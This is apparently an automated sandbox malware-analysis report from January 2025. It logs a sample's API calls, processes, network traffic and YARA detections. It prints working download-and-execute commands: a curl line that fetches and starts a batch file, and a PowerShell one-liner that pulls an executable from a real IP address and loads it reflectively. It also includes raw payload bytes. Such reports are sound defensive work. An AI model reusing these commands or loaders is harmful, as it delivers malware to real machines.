NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0288a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0288b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0288c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0288d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 22, 2025, 1:46 p.m.	process_identifier: 2516 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0288e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Windows\Temp\AppS.bat

Creates a shortcut to an executable file (1 event)

file	C:\Windows\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	cmd.exe /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
cmdline	powershell -Command "$url = 'http://147.45.44.131/infopage/ioubcs.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"
cmdline	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
cmdline	C:\Windows\system32\cmd.exe /K AppS.bat

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 22, 2025, 1:46 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat filepath: cmd.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Jan. 22, 2025, 1:46 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (8 events)

Data received	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 21:33:47 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 21 Jan 2025 02:14:14 GMT ETag: "8a00-62c2deef96441" Accept-Ranges: bytes Content-Length: 35328 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELî$Üà"0> @ à`ìO ÐÀÐ H.textD `.rsrcÐ @@.relocÀ@B H¤!,}0\( ( o i +* %Z ]ÒaÒ %G i]aÒR X i2Ð( o ( 0rp s s o r>sp~(o &o r`sp~(o &o %~(¢o o rsp~(o r¬sp~(o o &( (( ( j( rÎsp( o BSJBv4.0.30319l#~(#Strings¬t#US´{#GUIDÄ{h#BlobW ú3JôJ»jãjKÛ§ÀúÏ++.2Û} ¸ó @â})ê} Ð¿ @`} ãó Ëó }´¢#AoAuAªAöuP gx¸ À ±~j!r!~y!!!~ )19AIQYaiqy¡L$©!©¡/©]5¹yAÁ<FÑiKÙýTáYé__ùe...ª.#³.+³.3À.;³.C³.KÆ.S³.[À.cæ.k.s; ¬l3l}g1BitVector32g2ConsoleApp167get_UTF8<Module>mscorlibAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceInvokeSystem.Net.MimeGetTypeMethodBaseGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteMercado.exeNtilgEncodingSystem.Runtime.Versi
Data received	GK7tY3vWGJBuZfmxUd/N4+JnfgLaG+opPCBH34al832WilKcLyt2wMhElCMn6tuUwIkxJL7QzYHVIn/9wM6VymdnsIgAmH1qNfLXSpkporMoj5oPbny7dkpARG8+tmsDm56kLjX42YRVdaJ9c0dPVnKq5IcHGFDkLOLY1cifvfYxFNzKGvTxrd0ayZjl8r3CxBaG7CymioODXLhz5k6C0edssfpdFFKtLPzzSVkatq6yvw8b3+YudXfXWV8vIPj0HpdYqSNywI/SXG/qfZcAntc5qXXWic6bqap1xM7bzqb66xjGGJAh/2lHlxKTaKzqV44U5PKi9okD2m1vpL2W2YQw4rA6gNFd+7WspV4Fzf0r5/6LhUFz9eWom4dee2D6iodbWTKqqkCAANqkKvxFy1VM73glQEAfTKSjO85NmY57urnBhFW8sCmnxxtacuun4wDHGCct87kdmFfvobp2WQvfcWg7ewBZGiUsaC4LicI75WEUjsDdsfEm3ZhUnuQpcdJQ11FtsXIRWciea/E3xYtYne77qo6Swos0bDzWz4P/OPu7BgqY5LGq9UoM06v1Lv3SFZZi6rc+AZCePmTnZhfPhnoq5MGJ2FpqrjRXjdQUM7T9CkdZknUpIsfSzog1Y66RmU6ds/wwjQNaSDrm/YiJy69osT/ABI7r9eeoG1Ef8/3rqJyGC3G8p7WARpVvYz65RkCbMOzrNcXWG2bpuInZGcamIfEKXJJJoKB63ZlbmuV3oobXyEOm5y6E3teL4zR1w87Uo/x9bYpCWCu3ce7Hmhnrb/L8xAtA/fC3pd4ZDPTyMuzJhcUy8bB5zxOcL265i0VZgWf7s1HYB0d6vWuWmYFGpb/1TUaaEOD2LoNBV1J6fjzCSRkJI7oiEdnJJ/vyqNofxKds9DyBBFutJz9xyd/e6fz1M8PeXHZw7ipTkoD9MuidQwCZd6i40cJUWyDuPJqUnZEq4OKXRkbfs+8o355Gl2H0NRRE31Pu+6cejEXkpbOxRgydpet5/AVAWm/lcm5AQdu+OvV+AhbQZaQicdEJhL22s7KIktCnpzUGj8GZ6PiyhsqNmyp8OgVUgYz7omqVnoBFsL+zj8DbgTWwb4zHE3yn8PhGz9ky4O6lENjGJvj1qdkexaRt8z+AG1qipr/8gFud7Tmz+kpanCK8bt/SkYf8MemcVADbtyj1QBecHSS+uU0IkhIp9XIIH9KLuiVhWJ9FiLunYIeB229kvDLCxoog6Tf1FEBaoac7Kg8dgDf76znV0Jm3d2Hn24aJsWKgy0MflXhk5cKelZP05jmAzIaV7/hwi4fb322kOlDL203kNTyFwVwEuz+3CodINWRg/ZHREDby
Data received	4KuUmkOisO0wixhHNK/l+g1U1OKsPniMHpm4tC2lkArXvGTpXxjPjna5qpRAA1J/MvTMwBPdpqOmF9ZHX/Ckr0nZnJbiurQJ2Vg0rLksGY4GdXrtLQaUwT70qWMByxP8dCXilUOOsbluvZPIEShiPSgI043qavrCj9Cc46YoT8JYwPA7v9PKgMI37KtRnIeLanjrWhPLgnY26MWZyQ71oGiTnJKr/nmlHpYONa3h/JLQCf65Z6qVhUKht+wxCdiVZPpxIJ2Ax7Z+oZKcSZi+9yjel00b9+6s3gqeniVt/oUDRBkrPrOeVVLILaMuWFGETL+grl+OjPk27KFbCcXgvuwtygna5utnrc8LwD31qGAAwtu38yTjmkKNpmg5bdLPwnH56Qfb0oj6P+STWYSPs3S7mdILw7p+rQMegdCl/fmQnMSfZyfxm9mCPXc16cSayDH2oW+SnY16qa/kGdGWLazk7gDfWT31LCmahEGgtu8g1o9FI//2lNYDwLd9tljVyJ+99ifflkoa9PGt3RrJjHSnqJZXloTxP7KIA8SY+vU3iQeUJ76m6ViNnHgwqOaTQkrjv+ss24JKtb6gZYSKwzzyq2EP1JH6cifcm0GMt7tsg5HKA/uyZgbY1YnpqnTACkVH+Ou6mNUKwLVvPdHMgsA57qlHStFkMrfhV1tJvHQ07sebxzD3pm6Rgox5qK7nGN/RbHsyq46d2GRqdPybgAChsyVVV45CIvz5ldUCwbR8r5CeT5686SbMBdpJpzZllp3KjXumqZFWlbvwLeWYUBDiO/MyVNfOdDbsKF2Mgvs06qNZF8viuOov1INJtL+yMprZF27h+Y2SFczl8SGdnUZA/jpjgpDNAvitZwXZ1Ir4IeaRX4KNrf4oz4bPCv7sPNbPg/84765WmYq0cbCmz8CSbjU3q4APjLPwp22Qg494r63mF8+GeirkwZ3NG6+tNELNlBR1KDQPgIlEYfm9UB9PQrVjrpGZTp2z6CXdkEgY+vOv2xzbJuv1/Fae3jrzLOKbUR/z6qDiF9vAOzynq1yTgfoz/OkcnYJlueku1YBIs60xjwqK12llpU1Nxpy29unM2UCKsOOik9UOw7Lm5ATe14v3IOeAlcsyvGm4ntcI/rdtO9fc32s7+DkAid9r4ef03giHunT5pkmFxTLxpGyfgI5/rrAMBpgUbn3/kw9fze5oe8IMlBK/+HGOFY8AM3OuV8/R0+73uMKCHg0hKSacWAOn+/Ko2h/Es3mkr5NIjyoi+rdOlE1hfmH1Al5Yoe9wcAADEz01qI7GQAn4rnvBB9WbaO48yUuNgvK7JFwMxt+z7yjfnkaJrnFx1APaVOz89JAcSmagsqCQ
Data received	HYKm7Tsqn41XqyK4KofSES9sePeFBZ2gI6f3AIzYbGNleN3S3mZjNpHcx0I0JulYFc2AeCjqw5/LDPu3fgPVysWkquMc0otBL+P6kMTMtjthrJebTKOx6iPbkkYm+PW5Ss0WsGy3P0Kazmwt/nHFGgyg7KWgARoYJ++0yUYCVy1lPV5UjAh4pPrChBddZHZzRpPcl+x9c47aUt0nd3bHgFwcK/Qx0kYarSixd4ffXbZx5uVQGtCvov7vRJ3VvyA9KJVTjvy9aa1B1RytY6EYTpyRK7MwyJgS3yHnKcwM0hu+rLNLR95SOjfuwo/KC7BmbRDaRoAtquIBgB9iO/R+D0BSbntguAHJUKGw+bOJDVPw6aA/zVXc4u4xbp1eCO50PfUHnM2iO3mMiVxMMHLgFFGQhv8w5p9VE8/mpOYT0JUcMKGvDJseFua7coLeVbHo/Hvb1w43uKZnhpTBPvSpYwHd2Lb0Mynfw46xuW69k8gF/bBoONrTj/s865JPl5ojoHSJQlkCoicvAp6V0GQ/KVPaTMH8s6HaE8uCdjboxZnJDvWgf9jWCTEqqOUa0IV/LeH8ktAJ/rlnuMYQQrAlvzCB3VUwb6N/FweHrq1yBw0dDaPk8o0CSd91/jqLCpxMdb0vlRZcz34v555SEszppeUS0YRMv6C8DBuM62W88IpRVbRvrCqahZhlLDAyEJbT56Y9ZMRAyyGmNbdZQpwk63zkw9oQa+e9x9kSjb69olgTD8UzdLuZ0gvDum4+0M2BwTbtugMOmlUzonMOh9nrYjXuhIlZZDazPAeDST9v8KLSmwR8LOb/k88I/75mqZqEQaCmPPNDnhM24TKLlgSAsvjl11lOVPd9bV+WShr08a3dGsmMdKeolleE1XEs/srGDdj8JXjHhBQzuebpW4/IsrXtoFgIyuO/6yzbgkq1vqBzT8BDPPKrYQ/D2rDyJ9ybQYy3u2yDkdhSe7BmXwmAlOsqdMAJm19h/qvOwAjUofztAJhWGmp/OpQHl6Hj4fbGAZotZyWtx4sU42K3OISAzjLiLucYzod9K+f+nM4L+L9lqJuHQKejJVVXjkIi/PmV1QLBtHyvkJ5PnrzpJtyRSxng4rpPyAqe6vNpiACFaqQ498uDkvCtbKmU04pyvaaoXYyC+zTqo1kXy+K46jifycm0v6Nki4nCO/OqXg7A3bHmbZcYQIu0umOCkM0C+K1nBdnUm6s1N9oVAo29armf1AnBtGw81s+D/y4k5NaZirRxsKbfEMa/dTPvxoTGM/Cnf8EDjXj2fLMKHFO/r/nTiVxaqKS3RA2XEbO29QpHWZJ1KSLFRZYBKHG6AMkfh6O7tM6BCxjqIHxODZ2n
Data received	eOfl2tWUuvMs4ptRH/PqoOIXzItxvKerSljLejProlYWyOW56S7VgEizvKJbiojFOvClSh/VT2cwOk/Mh5PjtbPVgt5SKi5mQhWdC/cg55ZegbK8abie1wj+t207186btXFor1WYi7dwt6XeD8e+cjLs3s6PubskbJ+Ajn+urNkWzIF7KeXAjJ+Y+qw7AJmGBrV4M4jE3lU+J//Ilc+JOmKtlphNnLLrJNqTSSf78rqJisSj6fB+ywWKrWN/N1pJXvTraqudhwhwu6SqU5KA/TLonVcVyeSouZHUgRMj7fxB2NyX7WfmSBhVD2K7/AXN1xp5OHUTRh5UInV1UE7FpbUj8cfLgLF/brydwpauNnqqgADVrCv9PQBTS7ZytaTFn5U5Y6e42dIYpKL0UdzKw/6to9gVzYB4KOrDn8sM+6J8XtQARaSq4xzSi0Ev4/qQ0gf8u2Gsl45etyI/48gDE+bho7kIStCiK3AukA1R8nUq4JVPHfHsouAZzol3uqWCGdsMtrHpnFQUzue75xDXhk6xoqxL2Q7FKr33DNqfTug/a9/YBZgr87HfxN8rZvq2wJeTNfUi4ZRcj7C+b76cyQb8sX3yn1CO/D3qrVuGibF2tZvQDcW4cDDS2dZDNu75wc3Sle/99wDFVlIp4vmRS0gb4DC5RctXnvg4cdhPnu3+MalFCxauKXO615pTMuQ8eomcU7StIGiYAYHxe6Dm18qZv/Qp4ZRMHPbvo98Yz452uaqUR1vMfzDmn1UTz+ak5hPQh02wo69Yj43GN++mTxjQcmgtOUjJhK7utrbSgdNtJythRxaSNvQl4pVDjrG5br2TyAX9sGg42tOYsHZrklqFjrB1tJrTDMK7cT/T3cuIvKYrUZyHi3yzodoTy4J2NujFi5qb9bS6xQ3ZqjD7tUsBxXht+S9BRZiqLHq5T9bXpXNuMU/ZVXA997pFU9buL7CGDR1MfvXo2JNPXTykLN4byI91uKuXUJeF/i/nnkBBWemxN0RA350lsf4On9ht9uvhQ9oWdS+4uMeOkeUspaIHm1Zo5PyjANNJ5OJ8sotWHOJsrb5SzQH49aJNUJgI+j/kk1mEj7N0u5nSC8O6fG1FzZJQYzf7AMpV0uPmcZ0ViKDlYXzRypsppbJ8QkTbeL27d8kA0Kj2tW4ADJTrLbZ4zlCbsOV+M8fMRTGspsUHW1DjrOOTi5rJLK32RcUaSyWyrdleTQpypKiT0pTCOmRkmVMRzeim5BXShXO+oalen9J4N/4xDdKZs+46dEvWm/W55yWAiIh2cqthD8PasPIn3JtBjLe7bJVagIP7smYG2NWJ+T7lkFiDjLJrupjVH9Kh/OgR3xOV+ff/
Data received	R0vRoGDidF4Tj3c+tO7Hm8cw96ZukYKMeaiu5w+FzfZhZ/6czgv4v2Wom4dAp7XuH8XfwiD8pEFHV9DvLfzDStncqP21DEAfzS+jP0/eVpnodnjFgk+ro7z2iRMQ4XryOUeD26PlNvyMz4Lror+yDdTL9mq8vo9S06Xv8nXfHQE75zsPjtBL5OByAQkQ2rb4KMgQzQL4rWcF2dSK+CHmkV+Cm3YgOZ/UCcG0bDzWz4P/OO+uVpmKtHGltMuDE39moroGnZAjIfN4gtBc+q3rLV1Phnoq5MGdzQr5vGSXmIZHsf+rlZ4JQyH9+JbUBcK1Y66RmU6dobuw3YSZSC/h/AiHGiPudPuQUtSrYX/zwwAO53v0NtfOS3U5oa2X2QH6M+uiVhbI5bnpLtWASLOocEheHcUpZfYPnJVHY2z4jkxV2WYxoobX1NIqOfVQS8qYLXNykhsDoio8qcoUCO8lPiqPn53qqrx7lZpLsvLxbpSEjT5yMuzJhcUy8aRsn4COf669SsJMg2l6cMCMTAq6uW1WiwFBpbh1ToUZFLszZ0aD0dHpsTlQWF8ecClvkBNJJ/vyqNofxLN5pK+TVJuvOWFjmk4e8O2h4RbNiHC7pKpTkoD9MvrOwhXcdu59BIbSV+OsucvdWwQ+sbyP31NO53o1zEQVHL5g45AAmhGibGUXDoZh5HAzDIwRJ249v58WA7s0LPGeUY39OumsVIeItne2pNEOxLlzMe3a1VE15ncFD9pY4j32AQWYkDgvqttMGJlq9v+IjVoWMa4nnsIdFD63OZDG1qxuc/9EAJ0yJTt225CGIr137xJURbB4o6ySS5q49SrglU8d8eyi4Bnc2uK6sYaAwhLtZXSPiISbPquyAJeBDqlxf8wZ2lIl/X0OnsMaPv69jY4RS7uzsddA3GwkNbOTSAjg9SAhkNiN9nUlNdZJBvyxaznV0I78PeqtW4aJsXa1m8JcRbpk4oRa3BKoY/+LjdOYPasi3xaByfk368KYyg/0o2mUn4NEq6niG9OKaOWqfZHRBv24YKuUmkOisO0i2I1HJfn0qtgB1icqs/NCCo1upPzzx5+F5rqznx+PnefsaoTHxZeh5DTJxEgeejSzysDSXe/lZBIPjcY376ZaCsThve0q2ZxEt7imZ4aUwT7sPDKQTIw1bLbxRZFWYm14/4NeUOzkqzjOwF2oqfrGx5ZSICBtioYcgbtl7oMfkpHkdbsEjMSLeLChzsKbV2RlO1yJnB62O3nADVdpqO4uUFvP/y3h/JLQCf65Z6qVhUKht+wh2YxEJP73uYaAxbYjdQDJWMPvpHsKAQ8P4318D08cVSYpOFTMgxYu/rNKiAKfeLb0UdGX
Data received	nhppd2OVglpRtOmuSV/WtPY0q93Ky/k!OSh1Nr6RrT4ReA==)OSh1Nr6RrRkSZirR/v80!KT1nMaiZ8QoRYTw=!LTRyEa+d8S4YcA==9anRMLU9FXVlVWT1oJnJeZFJobH0=CC{ØN.K²_¿8é9 U I a mI q u y ·z\V4àTWrapNonExceptionThrowsMercadoCopyright Â© Mercado 2024)$f011c587-a767-47b5-b022-8be44153fc4f7.8.3.9I.NETFramework,Version=v4.5TFrameworkDisplayName.NET Framework 4.5. _CorExeMainmscoree.dllÿ% @ P8hÐ @@4VS_VERSION_INFO½ïþ ?DVarFileInfo$Translation° StringFileInfo\|000004b0(CommentsMercado0CompanyNameMercado8FileDescriptionMercado0FileVersion7.8.3.98InternalNameMercado.exeXLegalCopyrightCopyright © Mercado 20248LegalTrademarksMercado@OriginalFilenameMercado.exe0ProductNameMercado4ProductVersion7.8.3.98Assembly Version7.8.3.9à£êï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>@?
Data received

Poweshell is sending data to a remote host (1 event)

Data sent

GET /infopage/ioubcs.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 22, 2025, 1:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	cmd.exe /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
cmdline	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
cmdline	curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat

Communicates with host for which no DNS query was performed (1 event)

host

147.45.44.131

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Jan. 22, 2025, 1:46 p.m.	buffer: GET /infopage/ioubcs.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive socket: 1416 sent: 182	1	182	0

An executable file was downloaded by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Jan. 22, 2025, 1:46 p.m.	buffer: HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 21:33:47 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 21 Jan 2025 02:14:14 GMT ETag: "8a00-62c2deef96441" Accept-Ranges: bytes Content-Length: 35328 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELî$Üà"0> @ à`ìO ÐÀÐ H.textD `.rsrcÐ @@.relocÀ@B H¤!,}0\( ( o i +* %Z ]ÒaÒ %G i]aÒR X i2Ð( o ( 0rp s s o r>sp~(o &o r`sp~(o &o %~(¢o o rsp~(o r¬sp~(o o &( (( ( j( rÎsp( o BSJBv4.0.30319l#~(#Strings¬t#US´{#GUIDÄ{h#BlobW ú3JôJ»jãjKÛ§ÀúÏ++.2Û} ¸ó @â})ê} Ð¿ @`} ãó Ëó }´¢#AoAuAªAöuP gx¸ À ±~j!r!~y!!!~ )19AIQYaiqy¡L$©!©¡/©]5¹yAÁ<FÑiKÙýTáYé__ùe...ª.#³.+³.3À.;³.C³.KÆ.S³.[À.cæ.k.s; ¬l3l}g1BitVector32g2ConsoleApp167get_UTF8<Module>mscorlibAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceInvokeSystem.Net.MimeGetTypeMethodBaseGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteMercado.exeNtilgEncodingSystem.Runtime.Versi received: 2720 socket: 1416	1	2720	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2272 resumed a thread in remote process 2424
NtResumeThread Jan. 22, 2025, 1:46 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2424	1	0	0

iviewers.dll

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All